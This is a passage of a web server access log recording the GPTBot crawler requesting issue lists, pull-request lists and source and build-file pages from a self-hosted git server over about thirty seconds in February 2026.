+[17/Feb/2026:17:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11715] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" +[17/Feb/2026:17:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21735] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10101] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py?display=source" [Client 74.7.227.38] [Length 30396] [Gzip 8.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fGoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 23790] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fGoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 23803] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fGoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 23802] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" +[17/Feb/2026:17:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:17:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:17:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:17:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" +[17/Feb/2026:17:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" +[17/Feb/2026:17:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12036] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12029] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13486] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:17:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12030] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fgold_monitor_full.pkg" [Client 74.7.227.38] [Length 23819] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:17:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9931] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:17:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9943] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:17:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/storage.py?display=source" [Client 74.7.227.38] [Length 12014] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18303] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 